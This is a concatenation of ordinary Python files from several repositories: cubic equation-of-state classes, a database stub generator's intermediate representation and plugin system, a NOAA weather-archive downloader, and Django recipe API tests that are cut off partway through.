b1 = 0.08664 * self.R * self.T_crit / self.p_crit
super(RedlichKwong, self).__init__(b1, 0., b1, 0., fluid)
def get_a(self, T):
"""
Returns the temperature dependent coefficient :math:`a(T)`.
"""
Tr = T/self.T_crit
return self.a0/Tr**0.5
def get_diff_a_T(self, T):
"""
Returns the derivative of coefficient :math:`a(T)` wrt. temperature :math:`T`.
"""
Tr = T/self.T_crit
return -0.5*self.a0/T/Tr**0.5
def get_double_diff_a_T(self, T):
"""
Returns the second derivative of coefficient :math:`a(T)` wrt. temperature :math:`T`.
"""
Tr = T/self.T_crit
return 0.75*self.a0/T**2/Tr**0.5
class SoaveRedlichKwong(CubicEOS):
"""
Soave-Redlich-Kwong equation of state.
For details see: https://www.e-education.psu.edu/png520/m10_p5.html
:param fluid: a :class:`~pythermophy.fluid.Fluid` instance
:return: an :class:`~pythermophy.parent_class.EOS` instance
"""
def __init__(self, fluid):
self.acentric = fluid.acentric
self.p_crit = fluid.p_crit # Pa
self.T_crit = fluid.T_crit # K
self.a0 = 0.42748 * self.R**2 * self.T_crit**2 / self.p_crit
b1 = 0.08664 * self.R * self.T_crit / self.p_crit
self.kappa = 0.48508 + 1.55171*self.acentric - 0.15613*self.acentric**2
super(SoaveRedlichKwong, self).__init__(b1, 0., b1, 0., fluid)
def get_a(self, T):
"""
Returns the temperature dependent coefficient :math:`a(T)`.
"""
Tr = T/self.T_crit
alpha = (1 + self.kappa*(1 - Tr**0.5))**2
return alpha * self.a0
def get_diff_a_T(self, T):
"""
Returns the derivative of coefficient :math:`a(T)` wrt. temperature :math:`T`.
"""
Tr = T/self.T_crit
alpha0 = (1 + self.kappa*(1 - Tr**0.5))
return -(self.a0*self.kappa/T)*Tr**0.5 * alpha0
def get_double_diff_a_T(self, T):
"""
Returns the second derivative of coefficient :math:`a(T)` wrt. temperature :math:`T`.
"""
Tr = T/self.T_crit
alpha0 = (1 + self.kappa*(1 - Tr**0.5))
return (0.5*self.a0*self.kappa**2/T**2)*Tr + (0.5*self.a0*self.kappa/T**2)*Tr**0.5 * alpha0
class PengRobinson(CubicEOS):
"""
Peng-Robinson equation of state.
For details see: https://www.e-education.psu.edu/png520/m11_p2.html
:param fluid: a :class:`~pythermophy.fluid.Fluid` instance
:return: an :class:`~pythermophy.parent_class.EOS` instance
"""
def __init__(self, fluid):
self.acentric = fluid.acentric
self.p_crit = fluid.p_crit # Pa
self.T_crit = fluid.T_crit # K
self.a0 = 0.45724 * self.R**2 * self.T_crit**2 / self.p_crit
b1 = 0.07780 * self.R * self.T_crit / self.p_crit
self.kappa = 0.37464 + 1.54226*self.acentric - 0.26992*self.acentric**2
super(PengRobinson, self).__init__(b1, 0., 2*b1, -b1**2, fluid)
def get_a(self, T):
"""
Returns the temperature dependent coefficient :math:`a(T)`.
"""
Tr = T/self.T_crit
alpha = (1 + self.kappa*(1 - Tr**0.5))**2
return alpha * self.a0
def get_diff_a_T(self, T):
"""
Returns the derivative of coefficient :math:`a(T)` wrt. temperature :math:`T`.
"""
Tr = T/self.T_crit
alpha0 = (1 + self.kappa*(1 - Tr**0.5))
return -(self.a0*self.kappa/T)*Tr**0.5 * alpha0
def get_double_diff_a_T(self, T):
"""
Returns the second derivative of coefficient :math:`a(T)` wrt. temperature :math:`T`.
"""
Tr = T/self.T_crit
alpha0 = (1 + self.kappa*(1 - Tr**0.5))
return (0.5*self.a0*self.kappa**2/T**2)*Tr + (0.5*self.a0*self.kappa/T**2)*Tr**0.5 * alpha0
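# A minimal usage sketch (the fluid constants are deliberately left out because
# the Fluid constructor signature is not shown in this file; values and names
# below are assumptions):
#
#     co2 = Fluid(...)                 # needs at least T_crit, p_crit and the acentric factor
#     eos = PengRobinson(co2)
#     a_300 = eos.get_a(300.0)         # attraction parameter a(T) at 300 K
#     da_dT = eos.get_diff_a_T(300.0)  # its first temperature derivative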
```
#### File: equations-of-state/pythermophy/ideal_gas.py
```python
from __future__ import division, print_function
from .parent_class import EOS
class IdealGas(EOS):
"""
Ideal gas equation of state.
:param fluid: a :class:`~pythermophy.fluid.Fluid` instance
:return: an equation of state (:class:`~pythermophy.parent_class.EOS`) instance
"""
def __init__(self, fluid):
super(IdealGas, self).__init__(fluid)
def get_isothermal_compressibility(self, T, p, **kwargs):
"""
Returns the isothermal compressibility of an ideal gas
:param T: temperature (K) [only required for consistency with the
same function for other classes; not used in computation]
:type T: float
:param p: pressure (Pa)
:type p: float
:return: isothermal compressibility (1/Pa)
:rtype: float
"""
return 1/p
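        # Standard derivation behind the 1/p result: for an ideal gas V = nRT/p at
        # fixed T, so kappa_T = -(1/V) * (dV/dp)_T = -(p/(nRT)) * (-nRT/p**2) = 1/p.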
``` |
{
"source": "jjj4x/dbsg",
"score": 2
} |
#### File: dbsg/lib/intermediate_representation.py
```python
from __future__ import annotations
from dataclasses import dataclass, field
from typing import MutableSequence, Union, Optional
from dbsg.lib.configuration import FQDN
from dbsg.lib.introspection import (
COMPLEX_TYPES,
IntrospectionRow,
Introspection,
)
# **********************INTERMEDIATE REPRESENTATION TYPES**********************
Argument = Union['SimpleArgument', 'ComplexArgument']
# TODO: make generic arguments helper mixin
@dataclass
class SimpleArgument: # Flat
"""IR Argument superclass."""
name: str
position: int
sequence: int
data_level: int
data_type: str
custom_type_schema: Optional[str]
custom_type_package: Optional[str]
custom_type: Optional[str]
defaulted: bool
default_value: None # Always NULL, even if it's defaulted
in_out: str
@classmethod
def from_row(cls, row: IntrospectionRow):
"""Make IR argument type from an Introspection Row."""
return cls(
name=row.argument,
position=row.position,
sequence=row.sequence,
data_level=row.data_level,
data_type=row.data_type,
custom_type_schema=row.custom_type_schema,
custom_type_package=row.custom_type_package,
custom_type=row.custom_type,
defaulted=row.defaulted,
default_value=row.default_value,
in_out=row.in_out,
)
@property
    def custom_type_fqdn(self):  # FIXME: place into the ComplexArgument?
"""Make fqdn for complex custom types."""
return '.'.join(
i for i in (
self.custom_type_schema,
self.custom_type_package,
self.custom_type,
)
if i
)
@dataclass
class ComplexArgument(SimpleArgument): # with Nested Arguments
"""IR Complex argument extension."""
arguments: MutableSequence[Argument] = field(default_factory=list)
@property
def direct_child_data_level(self):
"""If ComplexArgument has lvl == 2, its arguments have lvl == 3."""
return self.data_level + 1
@property
def complex_child(self) -> ComplexArgument:
"""Last argument shortcut."""
if isinstance(self.arguments[-1], ComplexArgument):
return self.arguments[-1]
raise TypeError('There is no complex children.')
@property
def simple_child(self) -> SimpleArgument:
"""Last simple argument shortcut."""
if isinstance(self.arguments[-1], SimpleArgument):
return self.arguments[-1]
raise TypeError('There is no simple children.')
@property
def last_child(self) -> Argument:
"""Last argument shortcut."""
return self.arguments[-1]
def dispatch_argument(self, argument: Argument):
"""Dispatch an argument into appropriate data level."""
# NOTE: Data Level == 0 is handled at the Routine level
# NOTE: Data Level < direct_child_data_level is handled by Parents
# Child that should be lifted into desired Data Level
if argument.data_level > self.direct_child_data_level:
# In this context, last_argument is always a ComplexArgument
self.complex_child.dispatch_argument(argument)
# Direct Child that should be placed at the Top
else:
self.arguments.append(argument)
@dataclass
class Routine:
"""IR routine type."""
name: str
type: str
object_id: int
overload: Optional[int]
subprogram_id: int
fqdn: FQDN = field(init=False) # Set manually or in from_row
arguments: MutableSequence[Argument] = field(default_factory=list)
@classmethod
def from_row(cls, row: IntrospectionRow) -> Routine:
"""Make IR routine type from IntrospectionRow factory."""
routine = cls(
name=row.routine,
type=row.routine_type,
object_id=row.object_id,
overload=row.overload,
subprogram_id=row.subprogram_id,
)
routine.fqdn = FQDN( # noqa: WPS601
row.schema,
row.package if row.is_package else '',
row.routine,
)
return routine
@property
def complex_child(self) -> ComplexArgument:
"""Last complex argument shortcut."""
if isinstance(self.arguments[-1], ComplexArgument):
return self.arguments[-1]
raise TypeError('There is no complex children.')
@property
def simple_child(self) -> SimpleArgument:
"""Last simple argument shortcut."""
if isinstance(self.arguments[-1], SimpleArgument):
return self.arguments[-1]
raise TypeError('There is no simple children.')
@property
def last_child(self) -> Argument:
"""Last argument shortcut."""
return self.arguments[-1]
def dispatch_argument(self, argument: Argument):
"""Dispatch an argument into appropriate data level."""
# Data Level == 0 should be placed at the Top
if argument.data_level == 0:
self.arguments.append(argument)
# Data Level > 0 is a guarantee that the Arg should be nested
else:
# In this context, last_argument is always a ComplexArgument
self.complex_child.dispatch_argument(argument)
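    # Dispatch example (illustrative, not from the original docs): for a
    # record-typed argument introspected at data_level 0 followed by its fields
    # at data_level 1, the record is appended directly to self.arguments and
    # each field is forwarded to complex_child, so the IR mirrors the nesting
    # of the original routine signature.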
@property
def sorted_arguments(self) -> MutableSequence[Argument]:
"""Sort argument, placing default one to the end."""
return sorted(self.arguments, key=lambda a: a.defaulted)
@property
def has_ins(self):
"""Check for IN or IN/OUT arguments."""
return any(a for a in self.arguments if a.in_out != 'out')
@dataclass
class Package:
"""IR package type."""
name: str
is_package: bool
routines: MutableSequence[Routine] = field(default_factory=list)
@dataclass
class Schema:
"""IR Schema type."""
name: str
packages: MutableSequence[Package] = field(default_factory=list)
@dataclass
class Database:
"""IR DB type."""
name: str
schemes: MutableSequence[Schema] = field(default_factory=list)
def __post_init__(self):
"""Lowercase the name for consistency."""
self.name = self.name.lower()
def dispatch_routine(self, row: IntrospectionRow, routine: Routine):
"""Dispatch the Routine into appropriate <schema.package>."""
if self.schemes and row.schema == self.schemes[-1].name:
schema = self.schemes[-1]
else:
schema = Schema(name=row.schema)
self.schemes.append(schema)
if schema.packages and row.package == schema.packages[-1].name:
package = schema.packages[-1]
else:
package = Package(name=row.package, is_package=row.is_package)
schema.packages.append(package)
package.routines.append(routine)
IR = MutableSequence[Database]
# **********************INTERMEDIATE REPRESENTATION TYPES**********************
class Abstract:
"""Intermediate Representation Factory."""
def __init__(self, introspection: Introspection):
"""Initialize IR with Introspection."""
self.introspection = introspection
def intermediate_representation(self) -> IR:
"""Parse introspection and make intermediate representation."""
intermediate_representation = []
for introspected in self.introspection:
database = Database(name=introspected.name)
routine: Optional[Routine] = None # None before first iteration
oid = None
sid = None
# Can be multi-threaded/processed later
for schema in introspected.schemes:
for row in schema.rows:
if row.data_type not in COMPLEX_TYPES:
argument = SimpleArgument.from_row(row)
else:
argument = ComplexArgument.from_row(row)
# The Sentinels:
# subprogram_id is unique for non-package routines
# object_id is unique for package routines
if oid != row.object_id or sid != row.subprogram_id:
routine = Routine.from_row(row)
database.dispatch_routine(row, routine)
# An excessive check for mypy validation
if routine is not None:
routine.dispatch_argument(argument)
oid = row.object_id
sid = row.subprogram_id
intermediate_representation.append(database)
return intermediate_representation
```
#### File: dbsg/lib/plugin.py
```python
from __future__ import annotations
from abc import ABCMeta, abstractmethod
from logging import getLogger
from importlib import import_module
from typing import Iterator, MutableMapping
from dbsg.lib.configuration import Configuration
from dbsg.lib.introspection import Introspection
from dbsg.lib.intermediate_representation import IR
LOG = getLogger(__name__)
# WPS407 Found mutable module constant. It makes sense here.
REGISTRY: MutableMapping[str, PluginMetaABC] = {} # noqa: WPS407
class PluginMetaABC(ABCMeta):
"""
Plugin Metaclass.
Registers plugins for later aliasing.
"""
# N804 first argument of a classmethod should be named 'cls'
def __new__(mcs, name, bases, namespace, **kwargs): # noqa: N804
"""Register all the unregistered plugins."""
new = super().__new__(PluginMetaABC, name, bases, namespace, **kwargs)
if not bases:
return new
if new.name() in REGISTRY:
LOG.info(
f'Skipping {name} ({new.name()}) registration. '
+ 'A plugin with the same name is already in '
+ f'REGISTRY: {REGISTRY[new.name()]}.',
)
else:
REGISTRY[new.name()] = new
return new
class PluginABC(metaclass=PluginMetaABC):
"""Plugin Interface."""
configuration: Configuration = NotImplemented
introspection: Introspection = NotImplemented
ir: IR = NotImplemented
@abstractmethod
def save(self, **kwargs):
"""Implement Plugin's logic."""
@classmethod
@abstractmethod
def name(cls):
"""Return verbose name."""
class Handler:
"""Default Plugin Handler."""
def __init__(
self,
configuration: Configuration,
introspection: Introspection,
ir: IR,
):
"""Initialize Plugin Handler, preloading all the standard plugins."""
# Preload all the standard plugins
import_module('dbsg.plugins')
self.configuration = configuration
self.introspection = introspection
self.ir = ir
def __iter__(self) -> Iterator[PluginABC]:
"""
Iterate over all the registered plugins.
Log all the unregistered ones.
"""
for name in self.configuration.plugins:
if name not in REGISTRY:
LOG.error(
f'The "{name}" plugin is not registered. Use '
+ f'{__name__}.PluginABC and your plugin will be '
+ 'registered automatically, or write a custom handler.',
)
continue
plugin: PluginABC = REGISTRY[name](
self.configuration,
self.introspection,
self.ir,
)
yield plugin
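# A minimal usage sketch (assumed wiring; the three arguments come from the
# earlier configuration, introspection and IR stages of the dbsg pipeline):
#
#     handler = Handler(configuration, introspection, ir)
#     for plugin in handler:
#         plugin.save()   # each registered plugin writes its own artefacts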
```
#### File: dbsg/plugins/json_plugin.py
```python
from dataclasses import asdict
from json import dumps
from dbsg.lib.plugin import PluginABC
REGISTRY_NAME = 'json'
class Plugin(PluginABC):
"""JSON plugin."""
def __init__(self, configuration, introspection, ir, **kwargs):
"""Initialize JSON plugin."""
self.configuration = configuration
self.introspection = introspection
self.ir = ir
self.kwargs = kwargs or {
'ensure_ascii': False,
'indent': 4,
}
@classmethod
def name(cls):
"""Alias in REGISTRY."""
return REGISTRY_NAME
def save(self, **kwargs):
"""Save JSON representation into an appropriate file."""
kwargs = kwargs or self.kwargs
path = self.configuration.path.absolute()
path.mkdir(parents=True, exist_ok=True)
for db in self.ir:
data = dumps({db.name: asdict(db)}, **kwargs)
(path / db.name).mkdir(exist_ok=True)
file = path / db.name / f'{db.name}.json'
with file.open('w', encoding='utf8') as fh:
fh.write(str(data))
JSONPlugin = Plugin # for direct imports
```
#### File: dbsg/tests/test_intermediate_representation.py
```python
from pytest import main
from dbsg.lib import configuration, introspection, intermediate_representation
def test_ir(dbsg_config_with_mocked_session: configuration.Configuration):
ir = intermediate_representation.Abstract(
introspection.Inspect(dbsg_config_with_mocked_session).introspection()
).intermediate_representation()
assert ir
def test_database(dbsg_config_with_mocked_session: configuration.Configuration):
ir = intermediate_representation.Abstract(
introspection.Inspect(dbsg_config_with_mocked_session).introspection()
).intermediate_representation()
db = ir[0]
assert db.name == 'db_name'
schema = db.schemes[0]
assert schema.name == 'bills'
package = schema.packages[0]
assert package.name == 'bill_utils_pkg'
routine = package.routines[0]
assert routine.name == 'payroll'
assert routine.type == 'procedure'
assert routine.object_id == 180000
assert str(routine.fqdn) == 'BILLS.BILL_UTILS_PKG.PAYROLL'
assert routine.has_ins
arg = routine.last_child
assert arg.name == 'out_payroll_id'
assert arg.in_out == 'out'
assert arg.data_type == 'number'
if __name__ == '__main__':
main(['-s', '-c', 'setup_tox.ini'])
``` |
{
"source": "jjj4x/noaa_scrapper",
"score": 2
} |
#### File: jjj4x/noaa_scrapper/noaa_scrapper.py
```python
from argparse import ArgumentParser
from dataclasses import asdict, dataclass, field
from io import BytesIO
from gzip import open as gzip_open
from logging import config as logging_config, getLogger
from multiprocessing import Process, Queue
from os import path as os_path, remove
from pathlib import Path
from queue import Empty, Full
from re import findall, match
from typing import Tuple
from tarfile import open as tar_open
from typing import Dict, List, Optional
from time import monotonic, sleep
from requests import get
SELF_PATH = Path(__file__)
DEFAULT_YEARS = ['1901', '1902']
LOG = getLogger(__name__)
LOG_CONF = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'root': {
'format': (
'SCRAP_NOAA[%(process)d] '
+ '[%(levelname)s] '
+ '[%(name)s] '
+ '%(message)s '
),
'datefmt': '%Y-%m-%dT%H:%M:%S',
'class': 'logging.Formatter',
},
},
'handlers': {
'stream': {
'class': 'logging.StreamHandler',
'formatter': 'root',
'stream': 'ext://sys.stderr',
},
},
'root': {
'handlers': ['stream'],
'level': 'INFO',
},
}
@dataclass
class Config:
# *********************************Defaults*********************************
DEFAULT_URL = 'https://www.ncei.noaa.gov/data/global-hourly/archive/isd/'
DEFAULT_INDEX_REGEX = r'>(isd_\d{4}_c.*.tar.gz)<'
DEFAULT_MEMBER_REGEX = r'\d+-\d+-\d+'
DEFAULT_RUN_TIME_MAX = 300 # 5 minutes
DEFAULT_WORKERS_COUNT = 2
DEFAULT_POLLING_TIMEOUT = 2
DEFAULT_TERMINATE_TIMEOUT = 2.
DEFAULT_TMP_DIR = Path('/tmp/noaa_stuff')
# **************************************************************************
# *********************************Options*********************************
logging: Dict = field(default_factory=lambda: LOG_CONF)
url: str = field(default=DEFAULT_URL)
index_regex: str = field(default=DEFAULT_INDEX_REGEX)
member_regex: str = field(default=DEFAULT_MEMBER_REGEX)
run_time_max: int = field(default=DEFAULT_RUN_TIME_MAX)
workers_count: int = field(default=DEFAULT_WORKERS_COUNT)
polling_timeout: float = field(default=DEFAULT_POLLING_TIMEOUT)
terminate_timeout: float = field(default=DEFAULT_TERMINATE_TIMEOUT)
    years: List[str] = field(default_factory=lambda: DEFAULT_YEARS)
force: bool = field(default=False)
tmp_dir: Path = field(default=DEFAULT_TMP_DIR)
is_compress: bool = field(default=False)
# *************************************************************************
def as_dict(self):
return asdict(self)
@classmethod
def normalize_years(cls, inp: str):
years = inp.split(',') if ',' in inp else inp.split('-')
if '-' in inp:
years = range(int(years[0]), int(years[1]) + 1)
return sorted(str(y) for y in years)
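    # Examples (derived from the parsing above): '1901' -> ['1901'],
    # '1903,1901' -> ['1901', '1903'], '1901-1903' -> ['1901', '1902', '1903'].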
@classmethod
def normalize_url(cls, inp: str):
return inp.rstrip('/') + '/'
@classmethod
def configure(cls, cli=None) -> 'Config':
args = (cli or CLI).parse_args().__dict__ or {}
return cls.activate_logging(Config(**args))
@classmethod
def activate_logging(cls, config: 'Config') -> 'Config':
"""
Activate global logging settings.
:param config: the conf
:return: the same conf
"""
log = config.logging
logging_config.dictConfig(log)
root_level = log['root']['level']
root_handlers = ', '.join(log['root']['handlers'])
LOG.info(f'The Root Logger [{root_level}] handlers: {root_handlers}')
return config
CLI = ArgumentParser()
CLI.add_argument(
'--url',
dest='url',
default=Config.DEFAULT_URL,
type=Config.normalize_url,
)
CLI.add_argument(
'--index-regex',
dest='index_regex',
default=Config.DEFAULT_INDEX_REGEX,
)
CLI.add_argument(
'--member-regex',
dest='member_regex',
default=Config.DEFAULT_MEMBER_REGEX,
)
CLI.add_argument(
'--run-time-max',
dest='run_time_max',
default=Config.DEFAULT_RUN_TIME_MAX,
type=int,
)
CLI.add_argument(
'--workers-count',
dest='workers_count',
default=Config.DEFAULT_WORKERS_COUNT,
type=int,
)
CLI.add_argument(
'--polling-timeout',
dest='polling_timeout',
default=Config.DEFAULT_POLLING_TIMEOUT,
type=float,
)
CLI.add_argument(
'--terminate_timeout',
dest='terminate_timeout',
default=Config.DEFAULT_TERMINATE_TIMEOUT,
type=float,
)
CLI.add_argument(
'--years',
dest='years',
default=DEFAULT_YEARS,
type=Config.normalize_years,
help='For example: --years 1901; --years 1901,1902; --years 1901-1930',
)
CLI.add_argument(
'--force',
action='store_true',
dest='force',
default=False,
help='Force overwrite files if they already exist.',
)
# noinspection PyTypeChecker
CLI.add_argument(
'--tmp-dir',
dest='tmp_dir',
default=Config.DEFAULT_TMP_DIR.absolute(),
type=Path,
help='Directory for dumping temporary data (tarball extraction).',
)
CLI.add_argument(
'--is-compress',
action='store_true',
dest='is_compress',
default=False,
help='If set, the result will be gzipped in filename like "1901.gz". Else '
'it will be saved as plaintext into "1901".',
)
class Worker(Process):
def __init__(
self,
worker_number: int,
conf: Config,
queue: 'Queue[Tuple[str, str]]', # (year, filename)
queue_done: 'Queue[str]',
daemon=True,
**kwargs,
):
super().__init__(daemon=daemon, **kwargs)
self.worker_number = worker_number
self.conf = conf
self.queue = queue
self.queue_done = queue_done
def run(self):
"""Worker loop."""
while True:
try:
year, filename = self.queue.get(timeout=2, block=True)
except Empty:
continue
LOG.info('Fetching %s', self.conf.url + filename)
res = get(self.conf.url + filename, stream=True)
if not (200 <= res.status_code < 300):
LOG.warning('Cannot download %s for some reason', filename)
self.queue_done.put(year, block=False)
continue
result = f'./{year}.gz' if self.conf.is_compress else f'./{year}'
if os_path.isfile(result) and not self.conf.force:
                LOG.info('The %s file already exists', result)
self.queue_done.put(year, block=False)
continue
if os_path.isfile(result) and self.conf.force:
                LOG.info('The %s file already exists; removing', result)
remove(result)
tmp = self.conf.tmp_dir / year
tmp.mkdir(exist_ok=True, parents=True)
LOG.info('Dumping %s into %s', filename, tmp.absolute())
with tar_open(fileobj=BytesIO(res.raw.read()), mode='r:gz') as tar:
data = (m.name for m in tar.getmembers())
data = (m for m in data if match(self.conf.member_regex, m))
tar.extractall(tmp.absolute())
_open = gzip_open if self.conf.is_compress else open
with _open(result, 'ab') as fd_result:
for data_file in data:
LOG.info('Aggregating %s into %s', data_file, result)
with (tmp / data_file).open(mode='rb') as fd_data_file:
fd_result.write(fd_data_file.read())
self.queue_done.put(year, block=False)
class Master:
"""Master process and load balancer."""
def __init__(self, conf: Config):
workers = [None for _ in range(conf.workers_count)]
self.workers: List[Optional[Worker]] = workers
self.queue: 'Queue[Tuple[str, str]]' = Queue()
self.queue_done: 'Queue[str]' = Queue()
self.conf = conf
def start(self):
"""Master loop."""
res = get(self.conf.url)
if not (200 <= res.status_code < 300):
res.raise_for_status()
index = {}
for filename in findall(self.conf.index_regex, res.text):
# filename == 'isd_1901_c20180826T025524.tar.gz'
_, year, *_ = filename.split('_')
index[year] = filename
for number in range(self.conf.workers_count):
worker = Worker(number, self.conf, self.queue, self.queue_done)
worker.start()
self.workers[number] = worker
pending = {year for year in self.conf.years if year in index}
if not pending:
LOG.warning(
'Cannot fetch %s. The available years are: %s.',
self.conf.years,
index.values(),
)
raise RuntimeError('There is nothing to do.')
for year in pending:
try:
self.queue.put((year, index[year]), block=False)
except Full:
LOG.warning('Cannot add %s; the queue is full.', year)
continue
start = monotonic()
while pending:
if monotonic() - start > self.conf.run_time_max:
raise RuntimeError('There is some dangling work.')
if any(not w.is_alive() for w in self.workers):
raise RuntimeError('Some worker is dead :(.')
while not self.queue_done.empty():
pending.discard(self.queue_done.get(block=False))
LOG.info(f'Waiting for {pending}.',)
sleep(self.conf.polling_timeout)
LOG.info('All done')
def stop(self):
LOG.info('Shutting down master process.')
self.queue.close()
self.queue_done.close()
workers = [w for w in self.workers if w is not None]
LOG.info('Trying to terminate workers.')
for worker in workers:
if worker.is_alive():
worker.terminate()
sleep(self.conf.terminate_timeout)
if not any(p.is_alive() for p in workers):
return
LOG.warning('Some workers did not stop. Killing all the workers :(.')
for worker in workers:
if worker.is_alive():
worker.kill()
def main(conf=None):
master = Master(conf or Config.configure())
try:
master.start()
finally:
master.stop()
if __name__ == '__main__':
main()
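# Example invocation (flags defined by the CLI parser above; aggregated yearly
# files are written to the current working directory):
#
#     python noaa_scrapper.py --years 1901-1905 --workers-count 4 --is-compress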
``` |
{
"source": "jjj4x/recipe-app-api",
"score": 2
} |
#### File: recipe/tests/test_recipe_api.py
```python
from tempfile import NamedTemporaryFile
from os import path
from django.contrib.auth import get_user_model
from django.shortcuts import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from PIL import Image
from core.models import Recipe, Tag, Ingredient
from recipe.serializers import RecipeSerializer, RecipeDetailSerializer
def upload_image_url(recipe_id):
"""URL for image upload."""
return reverse('recipe:recipe-upload-image', args=[recipe_id])
def sample_tag(user, **params):
"""Create a sample tag."""
params.setdefault('name', 'Main course')
return Tag.objects.create(user=user, **params)
def sample_ingredient(user, **params):
"""Create a sample ingredient."""
params.setdefault('name', 'Cinnamon')
return Ingredient.objects.create(user=user, **params)
def sample_recipe(user, **params):
"""Create a sample user."""
params.setdefault('title', 'Sample Recipe')
params.setdefault('time_minutes', 10)
params.setdefault('price', 5.0)
return Recipe.objects.create(user=user, **params)
class PublicRecipeAPITests(TestCase):
"""Publicly available Recipe API."""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.client = APIClient()
def test_login_required(self):
"""Test that login is required for listing."""
res = self.client.get(reverse('recipe:recipe-list'))
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateRecipeAPITests(TestCase):
"""Private Recipe API."""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.user = get_user_model().objects.create_user(
email='<EMAIL>',
password='<PASSWORD>',
)
def setUp(self):
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_recipes(self):
"""Test recipes listing."""
sample_recipe(self.user)
sample_recipe(self.user)
res = self.client.get(reverse('recipe:recipe-list'))
self.assertEqual(res.status_code, status.HTTP_200_OK)
recipes = Recipe.objects.all().order_by('-id')
serializer = RecipeSerializer(recipes, many=True)
self.assertEqual(res.data, serializer.data)
def test_recipes_limited_to_user(self):
"""Test recipes are limited to own user."""
user2 = get_user_model().objects.create_user(
email='<EMAIL>',
password='<PASSWORD>',
)
sample_recipe(user2)
sample_recipe(self.user)
res = self.client.get(reverse('recipe:recipe-list'))
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
recipes = Recipe.objects.filter(user=self.user)
serializer = RecipeSerializer(recipes, many=True)
self.assertEqual(res.data, serializer.data)
def test_recipe_detail(self):
"""Test viewing recipe detail."""
recipe = sample_recipe(self.user)
recipe.tags.add(sample_tag(self.user))
recipe.ingredients.add(sample_ingredient(self.user))
url = reverse('recipe:recipe-detail', args=[recipe.id])
res = self.client.get(url)
self.assertEqual(res.status_code, status.HTTP_200_OK)
sr = RecipeDetailSerializer(recipe)
self.assertEqual(res.data, sr.data)
def test_create_basic_recipe(self):
"""Test creating basic recipe."""
payload = {
'title': 'Chocolate cheesecake',
'time_minutes': 30,
'price': 5.0,
}
res = self.client.post(reverse('recipe:recipe-list'), payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
for key in payload:
self.assertEqual(getattr(recipe, key), payload[key])
def test_tag_assignment(self):
"""Test creating recipe with tags."""
tag1 = sample_tag(self.user, name='Vegan')
tag2 = sample_tag(self.user, name='Dessert')
payload = {
'title': 'Avocado Lime Cheesecake',
'tags': [tag1.id, tag2.id],
'time_minutes': 60,
'price': 20.0,
}
res = self.client.post(reverse('recipe:recipe-list'), payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
tags = recipe.tags.all()
self.assertEqual(tags.count(), 2)
self.assertIn(tag1, tags)
self.assertIn(tag2, tags)
def test_ingredient_assignment(self):
"""Test creating recipe with ingredients."""
ing1 = sample_ingredient(self.user, name='Prawns')
ing2 = sample_ingredient(self.user, name='Ginger')
payload = {
            'title': 'Thai prawn red curry',
'ingredients': [ing1.id, ing2.id],
'time_minutes': 20,
'price': 7.0,
}
res = self.client.post(reverse('recipe:recipe-list'), payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
recipe = Recipe.objects.get(id=res.data['id'])
ings = recipe.ingredients.all()
self.assertEqual(ings.count(), 2)
self.assertIn(ing1, ings)
self.assertIn(ing2, ings)
def test_partial_update_recipe(self):
"""Patching a recipe."""
recipe = sample_recipe(self.user)
recipe.tags.add(sample_tag(self.user))
tag = sample_tag(self.user, name='Curry')
payload = {
'title': 'Chicken tikka',
'tags': [tag.id],
}
url = reverse('recipe:recipe-detail', args=[recipe.id])
self.client.patch(url, payload)
recipe.refresh_from_db()
self.assertEqual(recipe.title, payload['title'])
tags = recipe.tags.all()
self.assertEqual(len(tags), 1)
self.assertIn(tag, tags)
def test_full_update_recipe(self):
"""Putting a recipe (replace)."""
recipe = sample_recipe(self.user)
recipe.tags.add(sample_tag(self.user))
payload = {
'title': 'Spaghetti carbonara',
'time_minutes': 25,
'price': 5.0,
}
url = reverse('recipe:recipe-detail', args=[recipe.id])
self.client.put(url, payload)
recipe.refresh_from_db()
self.assertEqual(recipe.title, payload['title'])
self.assertEqual(recipe.time_minutes, payload['time_minutes'])
self.assertEqual(recipe.price, payload['price'])
tags = recipe.tags.all()
self.assertEqual(len(tags), 0)
def test_filter_recipes_by_tags(self):
"""Test filtering by tags."""
recipe1 = sample_recipe(self.user, title='Thai vegetable curry')
recipe2 = sample_recipe(self.user, title='Aubergine with tahini')
recipe3 = sample_recipe(self.user, title='Fish and chips')
tag1 = sample_tag(self.user, name='Vegan')
tag2 = sample_tag(self.user, name='Vegetarian')
recipe1.tags.add(tag1)
recipe2.tags.add(tag2)
res = self.client.get(
reverse('recipe:recipe-list'),
{'tags': f'{tag1.id},{tag2.id}'},
)
ser1 = RecipeSerializer(recipe1)
ser2 = RecipeSerializer(recipe2)
ser3 = RecipeSerializer(recipe3)
self.assertIn(ser1.data, res.data)
self.assertIn(ser2.data, res.data)
self.assertNotIn(ser3.data, res.data)
def test_filter_recipes_by_ingredients(self):
"""Test filtering by ingredients."""
recipe1 = sample_recipe(self.user, title='Posh beans on toast')
recipe2 = sample_recipe(self.user, title='Chicken cacciatore')
recipe3 = sample_recipe(self.user, title='Steak and mushrooms')
ing1 = sample_ingredient(self.user, name='Feta cheese')
ing2 = sample_ingredient(self.user, name='Chicken')
recipe1.ingredients.add(ing1)
recipe2.ingredients.add(ing2)
res = self.client.get(
reverse('recipe:recipe-list'),
{'ingredients': f'{ing1.id},{ing2.id}'},
)
ser1 = RecipeSerializer(recipe1)
ser2 = RecipeSerializer(recipe2)
ser3 = RecipeSerializer(recipe3)
self.assertIn(ser1.data, res.data)
self.assertIn(ser2.data, res.data)
self.assertNotIn(ser3.data, res.data)
class RecipeUploadImageTests(TestCase):
"""Test image uploads."""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.user = get_user_model().objects.create_user(
email='<EMAIL>',
password='<PASSWORD>',
)
def setUp(self):
self.client = APIClient()
self.client.force_authenticate(self.user)
self.recipe = sample_recipe(user=self.user)
def tearDown(self):
self.recipe.image.delete()
def test_upload_image(self):
